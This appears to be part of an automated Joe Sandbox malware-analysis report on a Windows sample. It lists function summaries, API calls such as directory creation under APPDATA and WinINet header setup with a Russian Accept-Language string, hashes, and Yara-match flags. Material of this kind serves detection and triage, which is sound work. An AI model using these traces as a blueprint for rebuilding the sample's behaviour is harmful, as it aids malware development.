                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04B3A2CB), ref: 04B3A94C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Azn
                                            • API String ID: 0-635255714
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDL
                                            • API String ID: 0-3662016964
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Y{
                                            • API String ID: 0-2887445246
                                            • Opcode ID: 85b5c864530c971e35fcaf1bdf678bb4f545a81b1118d00f1b7ae7ede8e9f7c7
                                            • Instruction ID: 43ce399a64652272871410fc75a7b61595072dbd29c493aea53c416392272302
                                            • Opcode Fuzzy Hash: 85b5c864530c971e35fcaf1bdf678bb4f545a81b1118d00f1b7ae7ede8e9f7c7
                                            • Instruction Fuzzy Hash: 372136F3E182284FE308AAB8DCA53B7B7D9DB54211F16453DDE46E7384E8719C0482D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction ID: e42d35f055ba6fdcd0a1a0af7e9804b4cd627a437853820cb6e1a68b715b958d
                                            • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction Fuzzy Hash: CE323321E29F015DD7238A35E932335A688AFB73D4F55C737EC1AB69A5EB28D0834500
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction ID: cacb134cf45b6d3893a07543428c3496bc224f7c3d1c732b13d01dd1be495d2a
                                            • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction Fuzzy Hash: DF323631E29F015DD7239A35D922336A649AFB73C4F56C737E815B5AA9EF28C4C34108
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac6b90ad7751f712fdde7beebfc13583e3eb28ac5d6b4f7dfb42aa8ab6d55719
                                            • Instruction ID: 97fba0bbca0d30bbc258951721acc79fa607aeb1195914c2836370d3f28179f6
                                            • Opcode Fuzzy Hash: ac6b90ad7751f712fdde7beebfc13583e3eb28ac5d6b4f7dfb42aa8ab6d55719
                                            • Instruction Fuzzy Hash: 48E1B1B3F046214BF3448E29DC94366B6D2EBD5320F2A863DDA89A77C8D97E5C058385
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: c8a6b38cdc1098edeeaf129ab7740c5ef43b9d99dae37acfc95c94745e411324
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 51B137316106099FD719CF28C48AB657BE0FF45364F29C698E99ACF2E1C335E992CB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db7f8deee30b6e898701c1ebdf187f014650636cbb355e1c780366e5d457f75e
                                            • Instruction ID: 5c11d191f112f7c148f1e3fbb0e5c75531660717dbae7f708017d42bcbac3be7
                                            • Opcode Fuzzy Hash: db7f8deee30b6e898701c1ebdf187f014650636cbb355e1c780366e5d457f75e
                                            • Instruction Fuzzy Hash: 7A51B0F3618604AFF3046E2DDCC5B7ABBD9EB94320F1A463DEBC587780D97529008696
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 752b03af3c7c41b96c2fa90b3a29a888cd11c536c108f9c107cfcd50047bff29
                                            • Instruction ID: 51eab8f97b33b2063638d87aeadde8f312555be1e9cea514dc0db600d6898b07
                                            • Opcode Fuzzy Hash: 752b03af3c7c41b96c2fa90b3a29a888cd11c536c108f9c107cfcd50047bff29
                                            • Instruction Fuzzy Hash: C36167F7F1152547F314493ACD583A22A839BD5320F3F82788B9C6BBC9D8BE5D0A5284
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8655e6867b769fd62e0aa45627b9e096c71fcc8fa063dfba5decad1863fd4031
                                            • Instruction ID: 453ef5fcecdbc0f3fa7d4a0d423d65065929adde0a3971461912ea4e9a06e447
                                            • Opcode Fuzzy Hash: 8655e6867b769fd62e0aa45627b9e096c71fcc8fa063dfba5decad1863fd4031
                                            • Instruction Fuzzy Hash: 8C5104B3E083345BE310AE69DC5477AF7D9EBD0720F1B853EDA9897280EA745C0186C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction ID: d0df103da5b9bac1177086f3a7303a90b6f901318e53e55c1934d55f851e32c2
                                            • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction Fuzzy Hash: 63516BB1E00705CFDB24CF95D881BAAB7F1FB48304F64802AC605EB260D379AA41CF99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: a9acc874ecb0f5199fb84964ad310363d56d86cc6c632ddcc042beb498c3c323
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: F211277724804247D6548A6FD4F86B6F395EBE532BB2C43FAD0858F75FD222B144D600
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: afae683734610caaa56b191e9f0799064e87d161038e498cc0cdf45931de0ef6
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: C911087720014143D689CA2EDDF86F7E7D7EBC532072D837AD24A4B758D12BB249AE00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: b545b07da7e7745530abcd8f67b80a540579b97e0dd86f1b90800f2e494ad7bb
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: F1115B7720004243D604862DCDF45BBA395EBC5320B2C477BD0516BBD4D33BD841968D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39d12d3348acbb43342affe199c22b62551e890e5d2b06635da3d9f784576d0c
                                            • Instruction ID: a017bae09b531abec47085a0347082e6a37e084aa1c8e4a7f035d436f8956512
                                            • Opcode Fuzzy Hash: 39d12d3348acbb43342affe199c22b62551e890e5d2b06635da3d9f784576d0c
                                            • Instruction Fuzzy Hash: 8901C23E0C8A2F6FCB028EB479050EABF95FE433347310515E942D6413D3710F466241
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F0C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f0c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 5d44b8f1167879dc54b60056c41cacb5695aafa838e227afafbac9870dadeab1
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 87117C72340100AFD744DF59DCC1FA677EAEB89330B298165ED08CB396D679E801E7A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: ad6c9417b8aa8b9db5240ebe6141aa7bacc950b144225d8a011904ef37c12727
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: BD01A276B006148FDF21EF25C804BAA33E5FFC6217F4548E5E90A9B289E774B9418B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                            • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                            • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                            • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                            Strings
                                            • kernel32.dll, xrefs: 00409BC0
                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                            • SleepConditionVariableCS, xrefs: 00409BD1
                                            • WakeAllConditionVariable, xrefs: 00409BDD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                            • API String ID: 2565136772-3242537097
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 1000A045
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                            • _free.LIBCMT ref: 1000A03A
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 1000A05C
                                            • _free.LIBCMT ref: 1000A071
                                            • _free.LIBCMT ref: 1000A07C
                                            • _free.LIBCMT ref: 1000A09E
                                            • _free.LIBCMT ref: 1000A0B1
                                            • _free.LIBCMT ref: 1000A0BF
                                            • _free.LIBCMT ref: 1000A0CA
                                            • _free.LIBCMT ref: 1000A102
                                            • _free.LIBCMT ref: 1000A109
                                            • _free.LIBCMT ref: 1000A126
                                            • _free.LIBCMT ref: 1000A13E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                            • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                            • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                            • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                            • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                            • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                            • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                            • String ID: APPDATA$TMPDIR
                                            • API String ID: 1838500112-4048745339
                                            • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                            • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                            Strings
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$H_prolog3_
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                            • API String ID: 1254599795-787135837
                                            • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                            • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                            • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                            • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                            • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: DecodePointer
                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                            • API String ID: 3527080286-3064271455
                                            • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                            • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 04B3C041
                                            • ___TypeMatch.LIBVCRUNTIME ref: 04B3C14F
                                            • _UnwindNestedFrames.LIBCMT ref: 04B3C2A1
                                            • CallUnexpected.LIBVCRUNTIME ref: 04B3C2BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 4fcd19b84ec876c657071385e29058719d2c3ac9453825a1ed13a401ebca1872
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: A5B15472800209EFDF19DFE6C8809AEBBB5FF04316B14419AE8157B216D735FA61CB91
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 04CFB1DA
                                            • ___TypeMatch.LIBVCRUNTIME ref: 04CFB2E8
                                            • _UnwindNestedFrames.LIBCMT ref: 04CFB43A
                                            • CallUnexpected.LIBVCRUNTIME ref: 04CFB455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 5a2126afdb599e55cc9f314cc84c8f670f1906fe3e60ef4c28957c9dc03ca9b6
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
